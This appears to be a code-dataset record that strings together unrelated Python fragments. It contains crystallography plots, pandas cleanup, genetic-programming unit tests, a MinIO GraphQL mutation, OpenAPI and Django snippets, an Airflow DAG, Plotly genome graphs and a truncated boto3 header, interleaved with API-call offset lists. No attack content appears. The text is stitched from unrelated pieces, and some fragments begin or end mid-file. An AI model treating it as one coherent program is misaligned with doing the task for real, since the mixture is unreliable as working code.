angles = [np.rad2deg(m.to_axis_angle()[1]) for m in mis]
plt.figure()
plt.hist(angles, bins = 30)
plt.show()
| [
"matplotlib.pyplot.hist",
"neml.cp.crystallography.SymmetryGroup",
"neml.math.rotations.random_orientations",
"matplotlib.pyplot.figure",
"numpy.rad2deg",
"sys.path.append",
"matplotlib.pyplot.show"
] | [((35, 59), 'sys.path.append', 'sys.path.append', (['"""../.."""'], {}), "('../..')\n", (50, 59), False, 'import sys\n'), ((238, 270), 'neml.math.rotations.random_orientations', 'rotations.random_orientations', (['N'], {}), '(N)\n', (267, 270), False, 'from neml.math import rotations\n'), ((283, 319), 'neml.cp.crystallography.SymmetryGroup', 'crystallography.SymmetryGroup', (['"""432"""'], {}), "('432')\n", (312, 319), False, 'from neml.cp import crystallography\n'), ((588, 606), 'numpy.rad2deg', 'np.rad2deg', (['angles'], {}), '(angles)\n', (598, 606), True, 'import numpy as np\n'), ((612, 624), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (622, 624), True, 'import matplotlib.pyplot as plt\n'), ((627, 652), 'matplotlib.pyplot.hist', 'plt.hist', (['angles'], {'bins': '(30)'}), '(angles, bins=30)\n', (635, 652), True, 'import matplotlib.pyplot as plt\n'), ((657, 667), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (665, 667), True, 'import matplotlib.pyplot as plt\n'), ((707, 740), 'neml.math.rotations.random_orientations', 'rotations.random_orientations', (['Np'], {}), '(Np)\n', (736, 740), False, 'from neml.math import rotations\n'), ((759, 792), 'neml.math.rotations.random_orientations', 'rotations.random_orientations', (['Np'], {}), '(Np)\n', (788, 792), False, 'from neml.math import rotations\n'), ((921, 933), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (931, 933), True, 'import matplotlib.pyplot as plt\n'), ((936, 961), 'matplotlib.pyplot.hist', 'plt.hist', (['angles'], {'bins': '(30)'}), '(angles, bins=30)\n', (944, 961), True, 'import matplotlib.pyplot as plt\n'), ((966, 976), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (974, 976), True, 'import matplotlib.pyplot as plt\n')] |
import numpy
import pandas as pd
# 替换异常值
if __name__ == '__main__':
df = pd.read_csv("../dataset/temp4.csv")
df.replace(to_replace='-', value=0.5, inplace=True)
print(df.head(3))
df.to_csv("../dataset/temp5.csv", index=False)
| [
"pandas.read_csv"
] | [((78, 113), 'pandas.read_csv', 'pd.read_csv', (['"""../dataset/temp4.csv"""'], {}), "('../dataset/temp4.csv')\n", (89, 113), True, 'import pandas as pd\n')] |
import unittest
import datetime
import genetic
import random
class Node:
Value = None
Left = None
Right = None
def __init__(self, value, left=None, right=None):
self.Value = value
self.Left = left
self.Right = right
def isFunction(self):
return self.Left is not None
def __str__(self):
result = self.Value
if self.isFunction():
result += "([" + str(self.Left) + "]"
if self.Right is not None:
result += ",[" + str(self.Right) + "]"
result += ")"
return result + " "
class Operation:
Func = None
HasLeft = None
HasRight = None
def __init__(self, func, hasLeft, hasRight):
self.Func = func
self.HasLeft = hasLeft
self.HasRight = hasRight
def getUsedIndexes(candidate):
used = {0: [0]}
if candidate[0].isFunction():
for i in reversed(range(len(candidate))):
element = candidate[i]
iUsed = [i]
if element.isFunction():
leftIndex = element.Left
rightIndex = element.Right
if i < leftIndex < len(candidate):
iUsed.extend(used[leftIndex])
if rightIndex is not None:
if i < rightIndex < len(candidate):
iUsed.extend(used[rightIndex])
used[i] = iUsed
return set(used[0])
def getFitness(candidate, geneset, rules):
usedIndexes = getUsedIndexes(candidate)
localCopy = candidate[:]
notUsed = list(set(range(len(candidate))) - usedIndexes)
for i in notUsed:
localCopy[i] = None
fitness = 0
for rule in rules:
if getFitnessForRule(localCopy, rule[0], rule[1], geneset) == rule[2]:
fitness += 1
if fitness == len(rules):
fitness = 1000 - len(usedIndexes)
return fitness
def getFitnessForRule(candidate, a, b, geneset):
if candidate[0].isFunction():
localCopy = candidate[:]
for i in reversed(range(len(localCopy))):
element = localCopy[i]
if element is None:
continue
if element.isFunction():
leftIndex = element.Left
rightIndex = element.Right
left = None
if i < leftIndex < len(localCopy):
left = localCopy[leftIndex].Value
right = None
if rightIndex is not None:
if i < rightIndex < len(localCopy):
right = localCopy[rightIndex].Value
value = element.Value
if isinstance(element.Value, str):
gene = geneset[element.Value]
value = gene.Func(left if left is not None else 0,
right if right is not None else 0)
localCopy[i] = Node(value)
else:
localCopy[i] = Node(geneset[element.Value].Func(a, b))
result = localCopy[0].Value
else:
result = geneset[candidate[0].Value].Func(a, b)
return result
def displayDot(candidate, startTime):
result = createDot(candidate.Genes)
timeDiff = datetime.datetime.now() - startTime
print("%s\nfitness: %i\t%s\t%s" % (";".join(result), candidate.Fitness, str(timeDiff), candidate.Strategy))
def createDot(genes):
dotCommands = []
added = [False for i in range(0, len(genes))]
stack = [0]
haveZeroNode = False
while len(stack) > 0:
index = stack.pop()
if added[index]:
continue
added[index] = True
element = genes[index]
if not element.isFunction():
dotCommands.append(str(index) + " [label=\"" + str(element.Value) + "\"]")
else:
dotCommands.append(str(index) + " [label=\"" + element.Value + "\"]")
leftIndex = element.Left
if index < leftIndex < len(genes):
stack.append(leftIndex)
dotCommands.append(str(leftIndex) + " -> " + str(index))
else:
if not haveZeroNode:
dotCommands.append("zero [label=\"0\"]")
haveZeroNode = True
dotCommands.append("zero -> " + str(index))
rightIndex = element.Right
if rightIndex is not None:
if index < rightIndex < len(genes):
stack.append(rightIndex)
dotCommands.append(str(rightIndex) + " -> " + str(index))
else:
if not haveZeroNode:
dotCommands.append("zero [label=\"0\"]")
haveZeroNode = True
dotCommands.append("zero -> " + str(index))
return dotCommands
def displayRaw(candidate, startTime):
timeDiff = datetime.datetime.now() - startTime
print("%s\t%i\t%s" %
((' '.join(map(str, [str(item) for item in candidate.Genes]))),
candidate.Fitness,
str(timeDiff)))
def mutate(childGenes, fnCreateGene):
childIndexesUsed = list(getUsedIndexes(childGenes))
index = childIndexesUsed[random.randint(0, len(childIndexesUsed) - 1)]
childGenes[index] = fnCreateGene(index, len(childGenes))
def crossover(child, parent):
usedParentIndexes = list(sorted(getUsedIndexes(parent)))
usedChildIndexes = list(getUsedIndexes(child))
if len(usedParentIndexes) == 1 and len(usedChildIndexes) == 1:
# node 0 has no child nodes, just copy it
child[0] = parent[0]
return
while True:
parentIndex = usedParentIndexes[random.randint(0, len(usedParentIndexes) - 1)]
childIndex = usedChildIndexes[random.randint(0, len(usedChildIndexes) - 1)]
if parentIndex != 0 or childIndex != 0:
# don't copy the root to the root
break
unusedChildIndexes = list(sorted(set(range(childIndex, len(child))) - set(usedChildIndexes)))
unusedChildIndexes.insert(0, childIndex)
mappedIndexes = {}
nextIndex = 0
for pIndex in usedParentIndexes:
if pIndex < parentIndex:
continue
if len(unusedChildIndexes) > nextIndex:
mappedIndexes[pIndex] = unusedChildIndexes[nextIndex]
else:
mappedIndexes[pIndex] = len(child) + nextIndex - len(unusedChildIndexes)
nextIndex += 1
for parentIndex in mappedIndexes.keys():
node = parent[parentIndex]
childIndex = mappedIndexes[parentIndex]
childNode = Node(node.Value, node.Left, node.Right)
if childIndex < len(child):
child[childIndex] = childNode
else:
child.append(childNode)
left = node.Left
if left is not None:
childNode.Left = mappedIndexes[left] if left in mappedIndexes else 0
right = node.Right
if right is not None:
childNode.Right = mappedIndexes[right] if right in mappedIndexes else 0
def createGene(index, length, geneset):
keys = list(geneset.keys())
key = keys[random.randint(0, len(keys) - 1)]
op = geneset[key]
left = random.randint(index, length - 1) if op.HasLeft else None
right = random.randint(index, length - 1) if op.HasRight else None
return Node(key, left, right)
class OperationGenerationTests(unittest.TestCase):
geneset = None
@classmethod
def setUpClass(cls):
cls.geneset = {'A': Operation(lambda a, b: a, False, False),
'B': Operation(lambda a, b: b, False, False),
'AND': Operation(lambda a, b: a & b, True, True),
'NOT': Operation(lambda a, b: a == 0, True, False)}
def test_generate_OR(self):
minNodes = 6 # not( and( not(a), not(b)))
rules = [[0, 0, 0], [0, 1, 1], [1, 0, 1], [1, 1, 1]]
maxNodes = 20
optimalValue = 1000 - minNodes
startTime = datetime.datetime.now()
fnDisplay = lambda candidate: displayDot(candidate, startTime)
fnGetFitness = lambda candidate: getFitness(candidate, self.geneset, rules)
fnCreateGene = lambda index, length: createGene(index, length, self.geneset)
fnMutate = lambda child: mutate(child, fnCreateGene)
best = genetic.getBest(fnGetFitness, fnDisplay, minNodes, optimalValue, createGene=fnCreateGene,
maxLen=maxNodes, customMutate=fnMutate, customCrossover=crossover)
self.assertTrue(best.Fitness >= optimalValue)
def test_generate_XOR(self):
minNodes = 9 # and( not( and(a, b)), not( and( not(a), not(b))))
rules = [[0, 0, 0], [0, 1, 1], [1, 0, 1], [1, 1, 0]]
maxNodes = 50
optimalValue = 1000 - minNodes
startTime = datetime.datetime.now()
fnDisplay = lambda candidate: displayDot(candidate, startTime)
fnGetFitness = lambda candidate: getFitness(candidate, self.geneset, rules)
fnCreateGene = lambda index, length: createGene(index, length, self.geneset)
fnMutate = lambda child: mutate(child, fnCreateGene)
best = genetic.getBest(fnGetFitness, fnDisplay, minNodes, optimalValue, createGene=fnCreateGene,
maxLen=maxNodes, customMutate=fnMutate, customCrossover=crossover)
self.assertTrue(best.Fitness >= optimalValue)
def test_generate_XOR_with_addition(self):
minNodes = 5 # and( 1, +(a, b))
geneset = {'A': Operation(lambda a, b: a, False, False),
'B': Operation(lambda a, b: b, False, False),
'AND': Operation(lambda a, b: a & b, True, True),
'NOT': Operation(lambda a, b: a == 0, True, False),
'+': Operation(lambda a, b: a + b, True, True),
'1': Operation(lambda a, b: 1, False, False)}
rules = [[0, 0, 0], [0, 1, 1], [1, 0, 1], [1, 1, 0]]
maxNodes = 50
optimalValue = 1000 - minNodes
startTime = datetime.datetime.now()
fnDisplay = lambda candidate: displayDot(candidate, startTime)
fnGetFitness = lambda candidate: getFitness(candidate, geneset, rules)
fnCreateGene = lambda index, length: createGene(index, length, geneset)
fnMutate = lambda child: mutate(child, fnCreateGene)
best = genetic.getBest(fnGetFitness, fnDisplay, minNodes, optimalValue, createGene=fnCreateGene,
maxLen=maxNodes, customMutate=fnMutate, customCrossover=crossover)
self.assertTrue(best.Fitness >= optimalValue)
def test_getFitness_given_base_node_is_A_and_1_matching_rule_should_return_1(self):
rules = [[0, 0, 0], [0, 1, 1]]
genes = [Node('A')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1)
def test_getFitness_given_base_node_is_B_and_1st_2_rules_match_should_return_2(self):
rules = [[0, 0, 0], [0, 1, 1], [1, 0, 1]]
genes = [Node('B')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 2)
def test_getFitness_given_base_node_is_NOT_with_Left_node_out_of_bounds_and_1st_rule_matches_should_return_1(self):
rules = [[1, 1, 1], [0, 0, 0]]
genes = [Node('NOT', 100, 0)]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1)
def test_getFitness_given_base_node_is_NOT_with_Left_node_A_and_2nd_rule_matches_should_return_1(self):
rules = [[0, 0, 0], [1, 1, 1]]
genes = [Node('NOT', 100, 0)]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1)
def test_getFitness_given_base_node_is_AND_with_both_nodes_out_of_bounds_and_0_matching_rules_should_return_0(self):
rules = [[1, 0, 1]]
genes = [Node('AND', 100, 100)]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 0)
def test_getFitness_given_all_rules_pass_and_1_gene_should_return_1000_minus_1(self):
rules = [[0, 0, 0]]
genes = [Node('AND', 100, 100)]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1000 - len(genes))
def test_getFitness_given_all_rules_pass_and_2_genes_but_only_1_used_should_return_1000_minus_1(self):
rules = [[0, 0, 0]]
genes = [Node('AND', 100, 100), Node('B')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1000 - 1)
def test_getFitness_given_all_rules_pass_and_3_genes_but_only_2_used_should_return_1000_minus_2(self):
rules = [[0, 0, 0]]
genes = [Node('AND', 2, 100), Node('AND', 2, 2), Node('B')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1000 - 2)
def test_getFitness_given_all_rules_pass_with_NOT_2_NOT_1_NOT_2_B_A_should_return_1000_minus_2(self):
rules = [[0, 0, 0]]
genes = [Node('NOT', 2), Node('NOT', 1), Node('NOT', 2), Node('B'), Node('A')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1000 - 2)
def test_getFitness_given_rules_and_genes_for_XOR_should_get_1000_minus_9(self):
rules = [[0, 0, 0], [0, 1, 1], [1, 0, 1], [1, 1, 0]]
# and( not( and(a, b)), not( and( not(a), not(b))))
genes = [Node('AND', 1, 2), Node('NOT', 3), Node('NOT', 4), Node('AND', 5, 6), Node('AND', 7, 8),
Node('NOT', 7), Node('NOT', 8), Node('A'), Node('B')]
result = getFitness(genes, self.geneset, rules)
self.assertEqual(result, 1000 - 9)
if __name__ == '__main__':
unittest.main()
| [
"unittest.main",
"datetime.datetime.now",
"genetic.getBest",
"random.randint"
] | [((13637, 13652), 'unittest.main', 'unittest.main', ([], {}), '()\n', (13650, 13652), False, 'import unittest\n'), ((3240, 3263), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (3261, 3263), False, 'import datetime\n'), ((4884, 4907), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (4905, 4907), False, 'import datetime\n'), ((7176, 7209), 'random.randint', 'random.randint', (['index', '(length - 1)'], {}), '(index, length - 1)\n', (7190, 7209), False, 'import random\n'), ((7246, 7279), 'random.randint', 'random.randint', (['index', '(length - 1)'], {}), '(index, length - 1)\n', (7260, 7279), False, 'import random\n'), ((7966, 7989), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (7987, 7989), False, 'import datetime\n'), ((8306, 8472), 'genetic.getBest', 'genetic.getBest', (['fnGetFitness', 'fnDisplay', 'minNodes', 'optimalValue'], {'createGene': 'fnCreateGene', 'maxLen': 'maxNodes', 'customMutate': 'fnMutate', 'customCrossover': 'crossover'}), '(fnGetFitness, fnDisplay, minNodes, optimalValue, createGene\n =fnCreateGene, maxLen=maxNodes, customMutate=fnMutate, customCrossover=\n crossover)\n', (8321, 8472), False, 'import genetic\n'), ((8798, 8821), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (8819, 8821), False, 'import datetime\n'), ((9138, 9304), 'genetic.getBest', 'genetic.getBest', (['fnGetFitness', 'fnDisplay', 'minNodes', 'optimalValue'], {'createGene': 'fnCreateGene', 'maxLen': 'maxNodes', 'customMutate': 'fnMutate', 'customCrossover': 'crossover'}), '(fnGetFitness, fnDisplay, minNodes, optimalValue, createGene\n =fnCreateGene, maxLen=maxNodes, customMutate=fnMutate, customCrossover=\n crossover)\n', (9153, 9304), False, 'import genetic\n'), ((10013, 10036), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (10034, 10036), False, 'import datetime\n'), ((10343, 10509), 'genetic.getBest', 'genetic.getBest', (['fnGetFitness', 'fnDisplay', 'minNodes', 
'optimalValue'], {'createGene': 'fnCreateGene', 'maxLen': 'maxNodes', 'customMutate': 'fnMutate', 'customCrossover': 'crossover'}), '(fnGetFitness, fnDisplay, minNodes, optimalValue, createGene\n =fnCreateGene, maxLen=maxNodes, customMutate=fnMutate, customCrossover=\n crossover)\n', (10358, 10509), False, 'import genetic\n')] |
from graphene import Schema, Mutation, String, Field, ID, List
from minio import Minio
from minio.error import ResponseError
from .minio_bucket import MinioBucket
from minio_client.client import minio_client
class CreateMinioBucket(Mutation):
# Use minio bucket type definition to be returned when created
Output = MinioBucket
# Subclass for describing what arguments mutation takes
class Arguments:
bucket_name = String()
# Resolver function with arguments
def mutate(root, info, bucket_name):
try:
minio_client.make_bucket(bucket_name)
return {'bucket_name': bucket_name}
except ResponseError as err:
print(err) | [
"graphene.String",
"minio_client.client.minio_client.make_bucket"
] | [((429, 437), 'graphene.String', 'String', ([], {}), '()\n', (435, 437), False, 'from graphene import Schema, Mutation, String, Field, ID, List\n'), ((529, 566), 'minio_client.client.minio_client.make_bucket', 'minio_client.make_bucket', (['bucket_name'], {}), '(bucket_name)\n', (553, 566), False, 'from minio_client.client import minio_client\n')] |
import mock
import pytest
from openapi_core.schema.links.models import Link
from openapi_core.schema.servers.models import Server
class TestLinks(object):
@pytest.fixture
def link_factory(self):
def link_factory(request_body, server):
parameters = {
'par1': mock.sentinel.par1,
'par2': mock.sentinel.par2,
}
return Link(
'op_id',
parameters,
request_body,
'Test link',
server
)
return link_factory
servers = [
None,
Server("https://bad.remote.domain.net/"),
Server("http://localhost")
]
request_body_list = [
None,
"request",
'{"request": "value", "opt": 2}',
{"request": "value", "opt": 2}
]
@pytest.mark.parametrize("server", servers)
@pytest.mark.parametrize("request_body", request_body_list)
def test_iteritems(self, link_factory, request_body, server):
link = link_factory(request_body, server)
for par_name in link.parameters:
assert link[par_name] == link.parameters[par_name]
| [
"pytest.mark.parametrize",
"openapi_core.schema.servers.models.Server",
"openapi_core.schema.links.models.Link"
] | [((861, 903), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""server"""', 'servers'], {}), "('server', servers)\n", (884, 903), False, 'import pytest\n'), ((909, 967), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""request_body"""', 'request_body_list'], {}), "('request_body', request_body_list)\n", (932, 967), False, 'import pytest\n'), ((625, 665), 'openapi_core.schema.servers.models.Server', 'Server', (['"""https://bad.remote.domain.net/"""'], {}), "('https://bad.remote.domain.net/')\n", (631, 665), False, 'from openapi_core.schema.servers.models import Server\n'), ((675, 701), 'openapi_core.schema.servers.models.Server', 'Server', (['"""http://localhost"""'], {}), "('http://localhost')\n", (681, 701), False, 'from openapi_core.schema.servers.models import Server\n'), ((403, 463), 'openapi_core.schema.links.models.Link', 'Link', (['"""op_id"""', 'parameters', 'request_body', '"""Test link"""', 'server'], {}), "('op_id', parameters, request_body, 'Test link', server)\n", (407, 463), False, 'from openapi_core.schema.links.models import Link\n')] |
import sys
from collections import deque
n = int(sys.stdin.readline())
deck = deque(list(range(1, n+1)))
for i in range(n-1):
deck.popleft()
deck.append(deck.popleft())
print(str(deck.pop()))
| [
"sys.stdin.readline"
] | [((50, 70), 'sys.stdin.readline', 'sys.stdin.readline', ([], {}), '()\n', (68, 70), False, 'import sys\n')] |
# Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from django.urls import URLPattern
DEBUG: bool = True
DEFAULT_FROM_EMAIL: str = '<EMAIL>'
SECRET_KEY: str = 'not so secret'
MY_SETTING: URLPattern = URLPattern(pattern='foo', callback=lambda: None)
| [
"django.urls.URLPattern"
] | [((284, 333), 'django.urls.URLPattern', 'URLPattern', ([], {'pattern': '"""foo"""', 'callback': '(lambda : None)'}), "(pattern='foo', callback=lambda : None)\n", (294, 333), False, 'from django.urls import URLPattern\n')] |
import json
from datetime import timedelta, datetime
from requests import get
from airflow import DAG
from airflow.models import Variable
from airflow.operators.python_operator import PythonOperator
# Config variables
# dag_config = Variable.get("hello_world_variables", deserialize_json=True)
default_args = {
'owner': 'nalin',
'depends_on_past': True,
'start_date': datetime(2020, 12, 4),
# 'end_date': datetime(2018, 12, 5),
'email': ['<EMAIL>'],
'email_on_failure': True,
'email_on_retry': True,
'retries': 2,
'retry_delay': timedelta(minutes=2),
}
# Set Schedule: Run pipeline once a day.
# Use cron to define exact time. Eg. 8:15am would be "15 08 * * *"
schedule_interval = "21 1 * * *"
# Define DAG: Set ID and assign default args and schedule interval
dag = DAG(
'fake_rest_api',
default_args=default_args,
schedule_interval=schedule_interval
)
def hello_world():
print("Hello World")
def fetch_data():
url = "https://jsonplaceholder.typicode.com/todos"
response = get(url)
if response.status_code == 200:
print(response.text)
else:
print(response.status_code)
def bye_world():
print("Bye World")
t1 = PythonOperator(
task_id='print_hello_world',
provide_context=False,
python_callable=hello_world,
dag=dag,
)
t2 = PythonOperator(
task_id='fetch_data',
provide_context=False,
python_callable=fetch_data,
dag=dag,
)
t3 = PythonOperator(
task_id='print_bye_world',
provide_context=False,
python_callable=bye_world,
dag=dag,
)
t1 >> [t2]
t2 >> [t3] | [
"datetime.datetime",
"airflow.operators.python_operator.PythonOperator",
"requests.get",
"airflow.DAG",
"datetime.timedelta"
] | [((813, 902), 'airflow.DAG', 'DAG', (['"""fake_rest_api"""'], {'default_args': 'default_args', 'schedule_interval': 'schedule_interval'}), "('fake_rest_api', default_args=default_args, schedule_interval=\n schedule_interval)\n", (816, 902), False, 'from airflow import DAG\n'), ((1219, 1327), 'airflow.operators.python_operator.PythonOperator', 'PythonOperator', ([], {'task_id': '"""print_hello_world"""', 'provide_context': '(False)', 'python_callable': 'hello_world', 'dag': 'dag'}), "(task_id='print_hello_world', provide_context=False,\n python_callable=hello_world, dag=dag)\n", (1233, 1327), False, 'from airflow.operators.python_operator import PythonOperator\n'), ((1349, 1450), 'airflow.operators.python_operator.PythonOperator', 'PythonOperator', ([], {'task_id': '"""fetch_data"""', 'provide_context': '(False)', 'python_callable': 'fetch_data', 'dag': 'dag'}), "(task_id='fetch_data', provide_context=False, python_callable\n =fetch_data, dag=dag)\n", (1363, 1450), False, 'from airflow.operators.python_operator import PythonOperator\n'), ((1471, 1575), 'airflow.operators.python_operator.PythonOperator', 'PythonOperator', ([], {'task_id': '"""print_bye_world"""', 'provide_context': '(False)', 'python_callable': 'bye_world', 'dag': 'dag'}), "(task_id='print_bye_world', provide_context=False,\n python_callable=bye_world, dag=dag)\n", (1485, 1575), False, 'from airflow.operators.python_operator import PythonOperator\n'), ((387, 408), 'datetime.datetime', 'datetime', (['(2020)', '(12)', '(4)'], {}), '(2020, 12, 4)\n', (395, 408), False, 'from datetime import timedelta, datetime\n'), ((572, 592), 'datetime.timedelta', 'timedelta', ([], {'minutes': '(2)'}), '(minutes=2)\n', (581, 592), False, 'from datetime import timedelta, datetime\n'), ((1052, 1060), 'requests.get', 'get', (['url'], {}), '(url)\n', (1055, 1060), False, 'from requests import get\n')] |
from pathlib import Path
import dash_core_components as dcc
import dash_bootstrap_components as dbc
import dash_html_components as html
import plotly
import plotly.express as px
import plotly.graph_objects as go
from plotly.subplots import make_subplots
# -------------------- Graphing Functions --------------------
def single_chromosome_graph_line(
df,
chromosome,
chosen_template,
marker_width,
colors,
font_size,
xaxis_gridlines,
yaxis_gridlines,
font_family,
samples,
):
""" Filter out current chromosome and set x- and y-max"""
curr_chrom_data = df[df["Chromosome"] == chromosome]
y_max = float(curr_chrom_data["Value"].max())
fig = px.line(
curr_chrom_data,
x='Window',
y='Value',
category_orders={"Sample": samples},
color='Sample',
color_discrete_sequence=colors,
height=500,
)
fig.update_layout(
font=dict(
size=font_size,
family=font_family,
),
legend=dict(
itemsizing='trace',
orientation="h",
xanchor="left",
x=0,
y=1.02,
yanchor="bottom",
),
showlegend=True,
template=chosen_template,
title_x=0.5,
)
fig.update_xaxes(
title="Position",
rangemode='tozero',
showgrid=xaxis_gridlines,
)
fig.update_yaxes(
title="Value",
range=[0, y_max],
fixedrange=True,
showgrid=yaxis_gridlines,
)
fig.update_traces(
line=dict(width=float(marker_width)),
)
return fig
def single_chromosome_graph_scatter(
df,
chromosome,
chosen_template,
marker_width,
colors,
font_size,
xaxis_gridlines,
yaxis_gridlines,
font_family,
samples,
):
""" Filter out current chromosome and set x- and y-max"""
curr_chrom_data = df[df["Chromosome"] == chromosome]
y_max = float(curr_chrom_data["Value"].max())
fig = px.scatter(
curr_chrom_data,
x='Window',
y='Value',
category_orders={"Sample": samples},
color='Sample',
color_discrete_sequence=colors,
height=500,
)
fig.update_layout(
font=dict(
size=font_size,
family=font_family,
),
legend=dict(
itemsizing='trace',
orientation="h",
xanchor="left",
x=0,
y=1.02,
yanchor="bottom",
),
showlegend=True,
template=chosen_template,
title_x=0.5,
)
fig.update_xaxes(
title="Position",
rangemode='tozero',
showgrid=xaxis_gridlines,
)
fig.update_yaxes(
title="Value",
range=[0, y_max],
fixedrange=True,
showgrid=yaxis_gridlines,
)
fig.update_traces(
marker=dict(size=float(marker_width)),
)
return fig
def whole_genome_line(
df,
chromosomes,
samples,
colors,
marker_width,
template,
font_size,
y_max,
x_max,
xaxis_gridlines,
yaxis_gridlines,
font_family,
):
fig = make_subplots(
rows=len(chromosomes),
cols=1,
x_title="Position",
y_title="Edit Me!",
row_titles=chromosomes,
row_heights=[2]*len(chromosomes),
)
for n, sample in enumerate(samples):
legend_flag = True
for row, current_chromosome in enumerate(chromosomes, start=1):
filt = (df['Chromosome'] == current_chromosome) & (df["Sample"] == sample)
sample_chromosome_data = df[filt]
# Make figure
fig.add_trace(
go.Scatter(
x=sample_chromosome_data['Window'],
y=sample_chromosome_data['Value'],
mode='lines',
legendgroup=str(sample),
name=sample,
line=dict(
color=colors[n],
width=float(marker_width)
),
showlegend=legend_flag,
),
row=row,
col=1
)
legend_flag = False
continue
# --- Update Figure ---
fig.update_layout(
font=dict(size=font_size, family=font_family),
height=125*len(chromosomes),
hovermode="x unified",
legend=dict(
orientation="h",
yanchor="bottom",
y=1.02,
xanchor="left",
x=0,
itemsizing='trace',
title="",
),
margin=dict(
l=60,
r=50,
b=60,
t=10,
),
template=template,
title_x=0.5,
font_family="Arial",
)
fig.update_xaxes(
fixedrange=True,
range=[0, x_max],
showgrid=xaxis_gridlines,
)
fig.update_yaxes(
range=[0.0, y_max],
fixedrange=True,
showgrid=yaxis_gridlines,
)
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
# Rotate chromosome names to 0-degrees
for annotation in fig['layout']['annotations']:
if annotation['text'] == "Edit Me!":
continue
annotation['textangle']=0
annotation['align']="center"
return fig
def whole_genome_scatter(
df,
chromosomes,
samples,
colors,
marker_width,
template,
font_size,
y_max,
x_max,
xaxis_gridlines,
yaxis_gridlines,
font_family,
):
# fig = make_subplots(
# rows=len(chromosomes),
# cols=1,
# x_title="Position",
# y_title="Edit Me!",
# row_titles=chromosomes,
# row_heights=[2]*len(chromosomes),
# )
# for n, sample in enumerate(samples):
# legend_flag = True
# for row, current_chromosome in enumerate(chromosomes, start=1):
# filt = (df['Chromosome'] == current_chromosome) & (df["Sample"] == sample)
# sample_chromosome_data = df[filt]
# # Make figure
# fig.add_trace(
# go.Scatter(
# x=sample_chromosome_data['Window'],
# y=sample_chromosome_data['Value'],
# mode='markers',
# legendgroup=str(sample),
# name=sample,
# line=dict(
# color=colors[n],
# width=float(marker_width)
# ),
# showlegend=legend_flag,
# ),
# row=row,
# col=1
# )
# legend_flag = False
# continue
fig = px.scatter(
df,
x='Window',
y='Value',
category_orders={"Sample": samples},
color='Sample',
color_discrete_sequence=colors,
# height=500,
facet_row="Chromosome",
)
# --- Update Figure ---
fig.update_layout(
font=dict(size=font_size, family=font_family),
height=125*len(chromosomes),
hovermode="x unified",
legend=dict(
orientation="h",
yanchor="bottom",
y=1.02,
xanchor="left",
x=0,
itemsizing='trace',
title="",
),
margin=dict(
l=60,
r=50,
b=60,
t=10,
),
template=template,
title_x=0.5,
font_family=font_family,
)
fig.update_xaxes(
fixedrange=True,
range=[0, x_max],
showgrid=xaxis_gridlines,
)
fig.update_yaxes(
range=[0.0, y_max],
fixedrange=True,
showgrid=yaxis_gridlines,
title='',
)
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
fig.update_traces(marker=dict(size=float(marker_width)))
# Rotate chromosome names to 0-degrees
for annotation in fig['layout']['annotations']:
if annotation['text'] == "Edit Me!":
continue
annotation['textangle']=0
annotation['align']="center"
return fig
# -------------------- File Validation --------------------
def validate_signal_tracer_headers(df):
"""Validate that headers are correct"""
expected_headers = ["Chromosome", "Window", "Sample", "Value"]
try:
assert list(df.columns) == expected_headers
return True
except AssertionError:
return False
def validate_signal_tracer_values(xlsx_df):
"""Return False if value column data are not int or float"""
try:
assert xlsx_df['Value'].dtype != "object"
return True
except AssertionError:
return False
def validate_file_type(filename):
"""Return False if file type is not valid """
valid_filetypes = ['.tsv', '.csv', '.xlsx', '.txt']
filetype = Path(filename).suffix
if filetype not in valid_filetypes:
return False
else:
return True
| [
"plotly.express.line",
"plotly.express.scatter",
"pathlib.Path"
] | [((698, 846), 'plotly.express.line', 'px.line', (['curr_chrom_data'], {'x': '"""Window"""', 'y': '"""Value"""', 'category_orders': "{'Sample': samples}", 'color': '"""Sample"""', 'color_discrete_sequence': 'colors', 'height': '(500)'}), "(curr_chrom_data, x='Window', y='Value', category_orders={'Sample':\n samples}, color='Sample', color_discrete_sequence=colors, height=500)\n", (705, 846), True, 'import plotly.express as px\n'), ((2017, 2173), 'plotly.express.scatter', 'px.scatter', (['curr_chrom_data'], {'x': '"""Window"""', 'y': '"""Value"""', 'category_orders': "{'Sample': samples}", 'color': '"""Sample"""', 'color_discrete_sequence': 'colors', 'height': '(500)'}), "(curr_chrom_data, x='Window', y='Value', category_orders={\n 'Sample': samples}, color='Sample', color_discrete_sequence=colors,\n height=500)\n", (2027, 2173), True, 'import plotly.express as px\n'), ((6785, 6935), 'plotly.express.scatter', 'px.scatter', (['df'], {'x': '"""Window"""', 'y': '"""Value"""', 'category_orders': "{'Sample': samples}", 'color': '"""Sample"""', 'color_discrete_sequence': 'colors', 'facet_row': '"""Chromosome"""'}), "(df, x='Window', y='Value', category_orders={'Sample': samples},\n color='Sample', color_discrete_sequence=colors, facet_row='Chromosome')\n", (6795, 6935), True, 'import plotly.express as px\n'), ((8960, 8974), 'pathlib.Path', 'Path', (['filename'], {}), '(filename)\n', (8964, 8974), False, 'from pathlib import Path\n')] |
import boto3
import csv
import json
import argparse
'''
You need to have aws configured with access tokens prior to running this script (use aws configure)
'''
